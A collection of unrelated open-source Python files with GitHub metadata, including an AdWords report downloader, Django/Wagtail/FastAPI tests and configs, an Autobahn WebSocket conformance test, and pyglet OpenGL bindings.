dict Dictionary containing all the headers for the request
"""
headers = {}
if 'clientCustomerId' in self._headers:
headers['clientCustomerId'] = self._headers['clientCustomerId']
# Handle OAuth (if enabled) and ClientLogin
if self._headers.get('oauth2credentials'):
self._headers['oauth2credentials'].apply(headers)
else:
headers['Authorization'] = ('GoogleLogin %s' %
urllib.urlencode({'auth':
self._headers['authToken'].strip()}))
headers['returnMoneyInMicros'] = str(return_micros).lower()
headers['developerToken'] = self._headers['developerToken']
headers['User-Agent'] = self._headers['userAgent']
if Utils.BoolTypeConvert(self._config['compress']):
headers['Accept-Encoding'] = 'gzip'
headers['User-Agent'] += ',gzip'
headers['Content-Encoding'] = 'gzip'
return headers
def __MakeRequest(self, url, headers=None, fileobj=None, payload=None):
"""Performs an HTTPS request and slightly processes the response.
If fileobj is provided, saves the body to file instead of including it
in the return value.
Args:
url: str Resource for the request line.
headers: dict Headers to send along with the request.
fileobj: file File to save to (optional).
payload: str Xml to POST (optional).
Returns:
str Report data as a string if fileobj=None, otherwise None
"""
headers = headers or {}
request_url = self._op_config['server'] + url
orig_payload = payload
if Utils.BoolTypeConvert(self._config['compress']):
buffer = StringIO.StringIO()
gzip_file = gzip.GzipFile(mode='wb', fileobj=buffer)
gzip_file.write(payload)
gzip_file.close()
payload = buffer.getvalue()
headers['Content-Length'] = str(len(payload))
start_time = time.strftime('%Y-%m-%d %H:%M:%S')
request = urllib2.Request(request_url, payload, headers)
try:
response_code = '---'
response_headers = []
try:
response = urllib2.urlopen(request)
response_code = response.code
response_headers = response.info().headers
if response.info().get('Content-Encoding') == 'gzip':
response = gzip.GzipFile(fileobj=StringIO.StringIO(response.read()),
mode='rb')
if fileobj:
self.__DumpToFile(response, fileobj)
return None
else:
return response.read()
except urllib2.HTTPError, e:
response = e
response_code = response.code
response_headers = response.info().headers
if response.info().get('Content-Encoding') == 'gzip':
response = gzip.GzipFile(fileobj=StringIO.StringIO(response.read()),
mode='rb')
error = response.read()
self.__CheckForXmlError(response_code, error)
raise AdWordsError('%s %s' % (str(e), error))
except urllib2.URLError, e:
raise AdWordsError(str(e))
finally:
end_time = time.strftime('%Y-%m-%d %H:%M:%S')
xml_log_data = self.__CreateXmlLogData(start_time, end_time, request_url,
headers, orig_payload,
response_code, response_headers)
self.__LogRequest(xml_log_data)
def __CheckForXmlError(self, response_code, response):
if 'reportDownloadError' in response:
error_type = re.search(ERROR_TYPE_REGEX, response)
if error_type: error_type = error_type.group(1)
trigger = re.search(ERROR_TRIGGER_REGEX, response)
if trigger: trigger = trigger.group(1)
field_path = re.search(ERROR_FIELD_PATH_REGEX, response)
if field_path: field_path = field_path.group(1)
raise AdWordsReportError(response_code, error_type, trigger, field_path)
def _CheckAuthentication(self):
"""Ensures we have authentication values ready to make the request."""
if self._headers.get('oauth2credentials'):
self._RefreshCredentialIfNecessary(self._headers['oauth2credentials'])
else:
self.__ReloadAuthToken()
def _RefreshCredentialIfNecessary(self, credential):
"""Checks if the credential needs refreshing and refreshes if necessary."""
if (credential.token_expiry is not None and credential.token_expiry -
datetime.datetime.utcnow() <
datetime.timedelta(minutes=_OAUTH2_REFRESH_MINUTES_IN_ADVANCE)):
import httplib2
self._headers['oauth2credentials'].refresh(httplib2.Http())
def __ReloadAuthToken(self):
"""Ensures we have a valid auth_token in our headers."""
# Load/set authentication token. If authentication token has expired,
# regenerate it.
now = time.time()
if (('authToken' not in self._headers and
'auth_token_epoch' not in self._config) or
int(now - self._config['auth_token_epoch']) >= AUTH_TOKEN_EXPIRE):
if ('email' not in self._headers or
not self._headers['email'] or
'password' not in self._headers or
not self._headers['password']):
msg = ('Required authentication headers, \'email\' and \'password\', '
'are missing. Unable to regenerate authentication token.')
raise ValidationError(msg)
self._headers['authToken'] = Utils.GetAuthToken(
self._headers['email'], self._headers['password'],
AUTH_TOKEN_SERVICE, LIB_SIG, self._config['proxy'])
self._config['auth_token_epoch'] = time.time()
def __DumpToFile(self, response, fileobj):
"""Reads from response.read() and writes to fileobj.
Args:
response: file Some object that supports read().
fileobj: file Some object that supports write()
Returns:
number Number of bytes written.
"""
byteswritten = 0
while True:
buf = response.read(BUF_SIZE)
if buf:
fileobj.write(buf)
byteswritten += len(buf)
else:
break
return byteswritten
def __LogRequest(self, xml_log_data):
"""Logs the Report Download request.
Args:
xml_log_data: str Data to log for this request.
"""
log_handlers = self.__GetLogHandlers()
for handler in log_handlers:
handler['target'] = Logger.NONE
if handler['tag'] == 'xml_log':
handler['data'] += xml_log_data
for handler in log_handlers:
if (handler['tag'] and
Utils.BoolTypeConvert(self._config[handler['tag']])):
handler['target'] = Logger.FILE
# If debugging is On, raise handler's target two levels,
# NONE -> CONSOLE
# FILE -> FILE_AND_CONSOLE.
if Utils.BoolTypeConvert(self._config['debug']):
handler['target'] += 2
if (handler['target'] != Logger.NONE and handler['data'] and
handler['data'] != 'None' and handler['data'] != 'DEBUG: '):
self._logger.Log(handler['name'], handler['data'],
log_level=Logger.DEBUG, log_handler=handler['target'])
def __GetLogHandlers(self):
"""Gets a list of log handlers for the AdWords library.
Returns:
list Log handlers for the AdWords library.
"""
return [
{
'tag': 'xml_log',
'name': 'soap_xml',
'data': ''
},
{
'tag': 'request_log',
'name': 'request_info',
'data': ('host=%s operation=%s'
% (self._op_config['server'], 'ReportDownload'))
}
]
def __CreateXmlLogData(self, start_time, end_time, request_url,
request_headers, payload, response_code,
response_headers):
"""Transforms arguments into a string to log.
Args:
start_time: str Formatted start time.
end_time: str Formatted end time.
request_url: str URL POSTed to.
request_headers: dict Request headers sent with request.
payload: str Payload (http request body).
response_code: int Response code from remote server.
response_headers: list List of string headers received.
Returns:
str Data to log.
"""
    # Errors carry an explicit response code; otherwise assume success (200).
response_code = response_code or 200
return ('StartTime: %s\n%s\n%s\n\n%s\n\n%s\n%s\nEndTime: %s'
% (start_time, 'POST: %s' % request_url,
self.__SerializeRequestHeaders(request_headers), payload,
'HTTP %s' % response_code,
self.__SerializeResponseHeaders(response_headers), end_time))
def __SerializeRequestHeaders(self, request_headers):
"""Serializes the request headers into a string for logging.
Returns each key->value pair as "key: value" with newlines separating them.
Args:
request_headers: dict Dictionary of headers to serialize.
Returns:
str Serialized request headers.
"""
return '\n'.join(['%s: %s' % (key, request_headers[key])
for key in request_headers])
def __SerializeResponseHeaders(self, response_headers):
"""Serializes the response headers.
Headers are already formatted, this joins them into a single string.
Args:
response_headers: list List of string headers received.
Returns:
str Serialized response headers.
"""
return (''.join(response_headers)).strip()
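# Hedged usage sketch (illustrative only; assumes an already constructed
# ReportDownloader instance and that the AWQL below matches a real report
# type in the targeted API version):
def _example_awql_download(downloader):
  """Downloads a campaign performance report as CSV to report.csv."""
  query = ('SELECT CampaignId, Impressions FROM CAMPAIGN_PERFORMANCE_REPORT '
           'DURING LAST_7_DAYS')
  return downloader.DownloadReportWithAwql(query, 'CSV', file_path='report.csv')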
|
{
"content_hash": "dac267d9d3a3ffa5af2b96c989d6e2c6",
"timestamp": "",
"source": "github",
"line_count": 510,
"max_line_length": 80,
"avg_line_length": 36.48235294117647,
"alnum_prop": 0.6260346124905944,
"repo_name": "caioserra/apiAdwords",
"id": "6933382501ce4937233c013f4669371176f33287",
"size": "19224",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "adspygoogle/adwords/ReportDownloader.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "47375"
},
{
"name": "Python",
"bytes": "3481410"
},
{
"name": "Shell",
"bytes": "14782"
}
],
"symlink_target": ""
}
|
import httplib2
from googleapiclient import discovery
from spuc import utils
def create_user(user_config, service_config):
user_config = \
utils.convert_config_file(user_config)['gapps']
service_config = \
utils.convert_config_file(service_config)['gapps']
credentials = utils.get_oauth_credentials(
credential_config_dict=service_config,
scopes=utils.GOOGLE_SCOPES,
name_prefix='google'
)
http = credentials.authorize(httplib2.Http())
service = discovery.build('admin', 'directory_v1', http=http)
result = service.users().insert(body=user_config).execute()
return result
|
{
"content_hash": "8b10a72d8170cc143bd6f5f70f011d6f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 65,
"avg_line_length": 28.782608695652176,
"alnum_prop": 0.676737160120846,
"repo_name": "davidginzbourg/spuc",
"id": "ee9e7d9a6966d86d2d1d972b07493a6cebcd611c",
"size": "662",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spuc/services/gapps_handler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "800"
},
{
"name": "Python",
"bytes": "10619"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import os
import sys
from django.conf import settings
# Corrects some pathing issues in various contexts, such as cron jobs,
# and the project layout still being in Django 1.3 format.
sys.path.append(os.path.abspath(os.path.join(settings.PROJECT_ROOT, "..")))
# Add the site ID CLI arg to the environment, which allows for the site
# used in any site related queries to be manually set for management
# commands.
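# For example, a hypothetical invocation:
#   python manage.py some_command --site=2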
for i, arg in enumerate(sys.argv):
if arg.startswith("--site"):
os.environ["MEZZANINE_SITE_ID"] = arg.split("=")[1]
sys.argv.pop(i)
# Run Django.
if __name__ == "__main__":
settings_module = "%s.settings" % settings.PROJECT_DIRNAME
os.environ.setdefault("DJANGO_SETTINGS_MODULE", settings_module)
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "102f6b9bf8b3d92204113df00e32d5b7",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 75,
"avg_line_length": 33.55555555555556,
"alnum_prop": 0.717439293598234,
"repo_name": "mauriziobit/cookiecutter-mezzanine",
"id": "4158e07eec807fd6000f85a134c5a2f56a97d320",
"size": "928",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "{{cookiecutter.project_name}}/project/manage.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "25491"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import unittest
import django
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.test import TestCase
from wagtail.wagtailcore.models import Page, PAGE_TEMPLATE_VAR, Site
@unittest.skipIf(django.VERSION < (1, 8), 'Multiple engines only supported in Django>=1.8')
class TestCoreJinja(TestCase):
def setUp(self):
# This does not exist on Django<1.8
from django.template import engines
self.engine = engines['jinja2']
self.user = get_user_model().objects.create_superuser(username='test', email='test@email.com', password='password')
self.homepage = Page.objects.get(id=2)
def render(self, string, context=None, request_context=True):
if context is None:
context = {}
template = self.engine.from_string(string)
return template.render(context)
def dummy_request(self, user=None):
site = Site.objects.get(is_default_site=True)
request = self.client.get('/')
request.site = site
request.user = user or AnonymousUser()
return request
def test_userbar(self):
content = self.render('{{ wagtailuserbar() }}', {
PAGE_TEMPLATE_VAR: self.homepage,
'request': self.dummy_request(self.user)})
self.assertIn("<!-- Wagtail user bar embed code -->", content)
def test_userbar_anonymous_user(self):
content = self.render('{{ wagtailuserbar() }}', {
PAGE_TEMPLATE_VAR: self.homepage,
'request': self.dummy_request()})
# Make sure nothing was rendered
self.assertEqual(content, '')
|
{
"content_hash": "fe08c31aa67c2e68d90d9df0588fda5b",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 123,
"avg_line_length": 33.03846153846154,
"alnum_prop": 0.6530849825378346,
"repo_name": "hanpama/wagtail",
"id": "b5392615997a552b1be832c3820753034d54eb35",
"size": "1718",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "wagtail/wagtailadmin/tests/test_jinja2.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "152699"
},
{
"name": "HTML",
"bytes": "251513"
},
{
"name": "JavaScript",
"bytes": "92646"
},
{
"name": "Makefile",
"bytes": "548"
},
{
"name": "Python",
"bytes": "1615982"
},
{
"name": "Shell",
"bytes": "7241"
}
],
"symlink_target": ""
}
|
"""
Global configuration for Code TA
"""
|
{
"content_hash": "fd99b472a62d915b918b34a30f035645",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 36,
"avg_line_length": 15,
"alnum_prop": 0.6222222222222222,
"repo_name": "smarie5/codeta",
"id": "b38687e63254c1ddd6b13117a9c365e9b61b8dc3",
"size": "45",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "codeta/conf/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2368"
},
{
"name": "JavaScript",
"bytes": "0"
},
{
"name": "Puppet",
"bytes": "123217"
},
{
"name": "Python",
"bytes": "12643"
},
{
"name": "Ruby",
"bytes": "640691"
},
{
"name": "Shell",
"bytes": "7340"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('django_tasker', '0005_auto_20170107_2302'),
]
operations = [
migrations.AlterIndexTogether(
name='taskinfo',
index_together=set([('id', 'eta', 'status'), ('id', 'target'), ('target', 'eta'), ('id', 'target', 'status', 'eta'), ('target', 'status')]),
),
]
|
{
"content_hash": "a215fa01fdb28dccda0f2de3915bcc9a",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 152,
"avg_line_length": 26.764705882352942,
"alnum_prop": 0.5692307692307692,
"repo_name": "wooyek/django-tasker",
"id": "071472a6ad42f636890dd1b7fadfc41ae82008ee",
"size": "528",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "django_tasker/migrations/0006_auto_20170120_1122.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "69412"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
def fail():
c1()
def c1():
c2()
def c2():
import exception
fail()
|
{
"content_hash": "cef0451ac65a2626f9549f47d18283e4",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 38,
"avg_line_length": 7.8125,
"alnum_prop": 0.56,
"repo_name": "guildai/guild",
"id": "9ce12e67055709b896a648b97b20927060b899f1",
"size": "125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "guild/tests/samples/projects/errors/stack.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "416"
},
{
"name": "JavaScript",
"bytes": "29682"
},
{
"name": "Makefile",
"bytes": "2621"
},
{
"name": "Python",
"bytes": "736181"
},
{
"name": "Shell",
"bytes": "1074"
},
{
"name": "Vue",
"bytes": "48469"
}
],
"symlink_target": ""
}
|
if __name__ == '__main__':
import unittest
import os
def load_tests(loader, tests, pattern):
tests_dir = os.path.dirname(__file__)
tests.addTests(loader.discover(start_dir=tests_dir, pattern=pattern or 'test*.py'))
return tests
unittest.main()
|
{
"content_hash": "944dc4e606890028f10818e890a83ee0",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 91,
"avg_line_length": 28.6,
"alnum_prop": 0.6118881118881119,
"repo_name": "sissaschool/elementpath",
"id": "29fb20ed1e69cde74d70af280582ff2c0fe53b2f",
"size": "1114",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_elementpath.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1405428"
}
],
"symlink_target": ""
}
|
"""
WSGI config for about_tmpl project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "about_tmpl.settings")
application = get_wsgi_application()
|
{
"content_hash": "6989a1af49bfaafb9e384100db50e2db",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.875,
"alnum_prop": 0.7688442211055276,
"repo_name": "JuneDeng2014/working_notes",
"id": "afb133c44ccdd77d9ab1c361120ba63f07537a8f",
"size": "398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "learn-django-by-example/about_tmpl/about_tmpl/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24"
},
{
"name": "GCC Machine Description",
"bytes": "4127"
},
{
"name": "HTML",
"bytes": "21668"
},
{
"name": "JavaScript",
"bytes": "631913"
},
{
"name": "Python",
"bytes": "72424"
}
],
"symlink_target": ""
}
|
from case import Case
class Case4_2_3(Case):
DESCRIPTION = """Send small text message, then send frame with reserved control <b>Opcode = 13</b>, then send Ping."""
EXPECTATION = """Echo for first message is received, but then connection is failed immediately, since reserved opcode frame is used. A Pong is not received."""
def onOpen(self):
payload = "Hello, world!"
self.expected[Case.OK] = [("message", payload, False)]
self.expected[Case.NON_STRICT] = []
self.expectedClose = {"closedByMe":False,"closeCode":[self.p.CLOSE_STATUS_CODE_PROTOCOL_ERROR],"requireClean":False}
self.p.sendFrame(opcode = 1, payload = payload)
self.p.sendFrame(opcode = 13)
self.p.sendFrame(opcode = 9)
self.p.killAfter(1)
|
{
"content_hash": "d3759c373ac8e8aafdde466d6c5eaa53",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 162,
"avg_line_length": 43.5,
"alnum_prop": 0.6628352490421456,
"repo_name": "crossbario/autobahn-testsuite",
"id": "66bed28e51f54cff01f8087939d6ac94da970fb5",
"size": "1581",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "autobahntestsuite/autobahntestsuite/case/case4_2_3.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1585"
},
{
"name": "Dockerfile",
"bytes": "1320"
},
{
"name": "HTML",
"bytes": "52193"
},
{
"name": "JavaScript",
"bytes": "6502"
},
{
"name": "Makefile",
"bytes": "3646"
},
{
"name": "Python",
"bytes": "515213"
},
{
"name": "Shell",
"bytes": "606"
}
],
"symlink_target": ""
}
|
from onfido import Api
from .test_data import * # flake8: noqa
import unittest2
import os
import time
import random
class IntegrationTest(unittest2.TestCase):
def create_api(self):
        # a suitably obscure env variable name, so it is unlikely to be set already
api_token = os.environ['ONFIDO_INTEGRATION_TEST_API_TOKEN']
return Api(api_token)
def create_input_applicant(self):
timestamp = str(int(time.time()))
input_applicant = test_applicant
input_applicant["last_name"] = timestamp
input_applicant["email"] = "{0}@example.com".format(timestamp)
return input_applicant
def test_integration_applicant(self):
api = self.create_api()
input_applicant = self.create_input_applicant()
created_applicant = api.Applicants.create(input_applicant)
onfido_created_fields = [ "id", "href", "created_at" ]
for onfido_field in onfido_created_fields:
self.assertTrue(onfido_field in created_applicant)
for input_field in input_applicant.keys():
self.assertTrue(input_field in created_applicant)
retrieved_applicant = api.Applicants.find(created_applicant["id"])
for field in retrieved_applicant.keys():
self.assertEqual(retrieved_applicant[field],
created_applicant[field])
all_applicants = api.Applicants.all()
found_applicant = False
for applicant in all_applicants["applicants"]:
if applicant["id"] == created_applicant["id"]:
found_applicant = True
self.assertTrue(found_applicant)
def test_integration_document(self):
api = self.create_api()
applicant = random.choice(api.Applicants.all()["applicants"])
document = open("onfido/test/passport.png", "rb")
doc_response = api.Documents.create(applicant["id"], document, "passport.png", "passport")
self.assertIn("id", doc_response)
def test_integration_live_photo(self):
api = self.create_api()
applicant = api.Applicants.all()["applicants"][0]
live_photo = open("onfido/test/passport.png", "rb")
response = api.LivePhotos.create(applicant["id"], live_photo,
'passport.png')
self.assertIn("id", response)
def test_integration_check(self):
api = self.create_api()
input_applicant = self.create_input_applicant()
created_applicant = api.Applicants.create(input_applicant)
check_details = {
"type": 'standard',
"reports": [{ "name": 'identity' }]
}
created_check = api.Checks.create(created_applicant["id"], check_details)
self.assertIn("id", created_check)
retrieved_check = api.Checks.find(created_applicant["id"], created_check["id"])
for field in retrieved_check.keys():
if field not in [ "reports" ]: # different value returned when creating vs returning :-S
self.assertEqual(retrieved_check[field],
created_check[field])
all_checks = api.Checks.all(created_applicant["id"])
found_check = False
for check in all_checks["checks"]:
if check["id"] == created_check["id"]:
found_check = True
self.assertTrue(found_check)
def test_integration_report(self):
# setup a new applicant + check
api = self.create_api()
input_applicant = self.create_input_applicant()
created_applicant = api.Applicants.create(input_applicant)
check_details = {
"type": 'standard',
"reports": [{ "name": 'identity' }]
}
created_check = api.Checks.create(created_applicant["id"], check_details)
report_id = created_check["reports"][0]["id"]
report = api.Reports.find(created_check["id"], report_id)
self.assertIn("id", report)
all_reports = api.Reports.all(created_check["id"])
report_found = False
for report in all_reports["reports"]:
if report["id"] == report_id:
report_found = True
self.assertTrue(report_found)
|
{
"content_hash": "5934905a72a0c14030dae4bf4624d357",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 100,
"avg_line_length": 34.68032786885246,
"alnum_prop": 0.6060033089104231,
"repo_name": "smcl/pyonfido",
"id": "02cda60d18f327a34747b4aa1960d304fb6984de",
"size": "4231",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "onfido/test/test_integration.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20961"
}
],
"symlink_target": ""
}
|
'''
'''
from __future__ import print_function
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import ctypes
import pyglet
__all__ = ['link_GL', 'link_GLU', 'link_AGL', 'link_GLX', 'link_WGL']
_debug_gl = pyglet.options['debug_gl']
_debug_gl_trace = pyglet.options['debug_gl_trace']
_debug_gl_trace_args = pyglet.options['debug_gl_trace_args']
class MissingFunctionException(Exception):
def __init__(self, name, requires=None, suggestions=None):
msg = '%s is not exported by the available OpenGL driver.' % name
if requires:
msg += ' %s is required for this functionality.' % requires
if suggestions:
msg += ' Consider alternative(s) %s.' % ', '.join(suggestions)
Exception.__init__(self, msg)
def missing_function(name, requires=None, suggestions=None):
def MissingFunction(*args, **kwargs):
raise MissingFunctionException(name, requires, suggestions)
return MissingFunction
_int_types = (ctypes.c_int16, ctypes.c_int32)
if hasattr(ctypes, 'c_int64'):
# Some builds of ctypes apparently do not have c_int64
# defined; it's a pretty good bet that these builds do not
# have 64-bit pointers.
_int_types += (ctypes.c_int64,)
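# Choose an integer type whose size matches size_t to serve as c_ptrdiff_t.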
for t in _int_types:
if ctypes.sizeof(t) == ctypes.sizeof(ctypes.c_size_t):
c_ptrdiff_t = t
class c_void(ctypes.Structure):
# c_void_p is a buggy return type, converting to int, so
# POINTER(None) == c_void_p is actually written as
# POINTER(c_void), so it can be treated as a real pointer.
_fields_ = [('dummy', ctypes.c_int)]
class GLException(Exception):
pass
def errcheck(result, func, arguments):
if _debug_gl_trace:
try:
name = func.__name__
except AttributeError:
name = repr(func)
if _debug_gl_trace_args:
trace_args = ', '.join([repr(arg)[:20] for arg in arguments])
print('%s(%s)' % (name, trace_args))
else:
print(name)
from pyglet import gl
context = gl.current_context
if not context:
raise GLException('No GL context; create a Window first')
if not context._gl_begin:
error = gl.glGetError()
if error:
msg = ctypes.cast(gl.gluErrorString(error), ctypes.c_char_p).value
raise GLException(msg)
return result
def errcheck_glbegin(result, func, arguments):
from pyglet import gl
context = gl.current_context
if not context:
raise GLException('No GL context; create a Window first')
context._gl_begin = True
return result
def errcheck_glend(result, func, arguments):
from pyglet import gl
context = gl.current_context
if not context:
raise GLException('No GL context; create a Window first')
context._gl_begin = False
return errcheck(result, func, arguments)
def decorate_function(func, name):
if _debug_gl:
if name == 'glBegin':
func.errcheck = errcheck_glbegin
elif name == 'glEnd':
func.errcheck = errcheck_glend
elif name not in ('glGetError', 'gluErrorString') and \
name[:3] not in ('glX', 'agl', 'wgl'):
func.errcheck = errcheck
link_AGL = None
link_GLX = None
link_WGL = None
if pyglet.compat_platform in ('win32', 'cygwin'):
from pyglet.gl.lib_wgl import link_GL, link_GLU, link_WGL
elif pyglet.compat_platform == 'darwin':
from pyglet.gl.lib_agl import link_GL, link_GLU, link_AGL
else:
from pyglet.gl.lib_glx import link_GL, link_GLU, link_GLX
|
{
"content_hash": "e68cb6a5a6fbda01b0ab89c014b89b84",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 78,
"avg_line_length": 32.28181818181818,
"alnum_prop": 0.6333427203604618,
"repo_name": "nicememory/pie",
"id": "8e56210fb421060d79969b93e518133e7a9ab91b",
"size": "5270",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "pyglet/pyglet/gl/lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "5318"
},
{
"name": "C",
"bytes": "6624"
},
{
"name": "CSS",
"bytes": "1828"
},
{
"name": "HTML",
"bytes": "9229"
},
{
"name": "JavaScript",
"bytes": "6751"
},
{
"name": "Makefile",
"bytes": "5773"
},
{
"name": "PHP",
"bytes": "2190"
},
{
"name": "Python",
"bytes": "9377528"
},
{
"name": "Shell",
"bytes": "664"
},
{
"name": "Vim script",
"bytes": "2952"
}
],
"symlink_target": ""
}
|
import importlib
import os
from pathlib import Path
import pytest
from ...utils import needs_py310
@needs_py310
def test_testing_dbs_py39(tmp_path_factory: pytest.TempPathFactory):
tmp_path = tmp_path_factory.mktemp("data")
cwd = os.getcwd()
os.chdir(tmp_path)
test_db = Path("./test.db")
if test_db.is_file(): # pragma: nocover
test_db.unlink()
# Import while creating the client to create the DB after starting the test session
from docs_src.sql_databases.sql_app_py310.tests import test_sql_app
# Ensure import side effects are re-executed
importlib.reload(test_sql_app)
test_sql_app.test_create_user()
if test_db.is_file(): # pragma: nocover
test_db.unlink()
os.chdir(cwd)
|
{
"content_hash": "0c2abf21006439eca5e30826051ca39b",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 87,
"avg_line_length": 28.76923076923077,
"alnum_prop": 0.6885026737967914,
"repo_name": "tiangolo/fastapi",
"id": "9e6b3f3e2ccb007eacaa28fb99124252259f180c",
"size": "748",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tutorial/test_sql_databases/test_testing_databases_py310.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "25"
},
{
"name": "HTML",
"bytes": "187"
},
{
"name": "Python",
"bytes": "1928986"
},
{
"name": "Shell",
"bytes": "1383"
}
],
"symlink_target": ""
}
|
from datetime import datetime, timedelta
from nose.tools import eq_
from mock import Mock, patch
import amo
import amo.tests
from addons.models import Addon
from users.models import UserProfile
from devhub.models import ActivityLog
from mkt.developers.models import (AddonPaymentAccount, CantCancel,
PaymentAccount, SolitudeSeller)
from mkt.developers.providers import get_provider
from mkt.site.fixtures import fixture
from test_providers import Patcher
class TestActivityLogCount(amo.tests.TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
now = datetime.now()
bom = datetime(now.year, now.month, 1)
self.lm = bom - timedelta(days=1)
self.user = UserProfile.objects.filter()[0]
amo.set_user(self.user)
def test_not_review_count(self):
amo.log(amo.LOG['EDIT_VERSION'], Addon.objects.get())
eq_(len(ActivityLog.objects.monthly_reviews()), 0)
def test_review_count(self):
amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
result = ActivityLog.objects.monthly_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 1)
eq_(result[0]['user'], self.user.pk)
def test_review_count_few(self):
for x in range(0, 5):
amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
result = ActivityLog.objects.monthly_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 5)
def test_review_last_month(self):
log = amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
log.update(created=self.lm)
eq_(len(ActivityLog.objects.monthly_reviews()), 0)
def test_not_total(self):
amo.log(amo.LOG['EDIT_VERSION'], Addon.objects.get())
eq_(len(ActivityLog.objects.total_reviews()), 0)
def test_total_few(self):
for x in range(0, 5):
amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
result = ActivityLog.objects.total_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 5)
def test_total_last_month(self):
log = amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
log.update(created=self.lm)
result = ActivityLog.objects.total_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 1)
eq_(result[0]['user'], self.user.pk)
def test_log_admin(self):
amo.log(amo.LOG['OBJECT_EDITED'], Addon.objects.get())
eq_(len(ActivityLog.objects.admin_events()), 1)
eq_(len(ActivityLog.objects.for_developer()), 0)
def test_log_not_admin(self):
amo.log(amo.LOG['EDIT_VERSION'], Addon.objects.get())
eq_(len(ActivityLog.objects.admin_events()), 0)
eq_(len(ActivityLog.objects.for_developer()), 1)
class TestPaymentAccount(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999')
def setUp(self):
self.user = UserProfile.objects.filter()[0]
solsel_patcher = patch('mkt.developers.models.SolitudeSeller.create')
self.solsel = solsel_patcher.start()
self.solsel.return_value = self.seller = (
SolitudeSeller.objects.create(
resource_uri='selleruri', user=self.user))
self.solsel.patcher = solsel_patcher
super(TestPaymentAccount, self).setUp()
def tearDown(self):
self.solsel.patcher.stop()
super(TestPaymentAccount, self).tearDown()
def test_create_bango(self):
# Return a seller object without hitting Bango.
self.bango_patcher.package.post.return_value = {
'resource_uri': 'zipzap',
'package_id': 123,
}
res = get_provider().account_create(
self.user, {'account_name': 'Test Account'})
eq_(res.name, 'Test Account')
eq_(res.user, self.user)
eq_(res.seller_uri, 'selleruri')
eq_(res.account_id, 123)
eq_(res.uri, 'zipzap')
self.bango_patcher.package.post.assert_called_with(
data={'paypalEmailAddress': 'nobody@example.com',
'seller': 'selleruri'})
self.bango_patcher.bank.post.assert_called_with(
data={'seller_bango': 'zipzap'})
def test_cancel(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller)
addon = Addon.objects.get()
AddonPaymentAccount.objects.create(
addon=addon, account_uri='foo',
payment_account=res, product_uri='bpruri')
res.cancel()
assert res.inactive
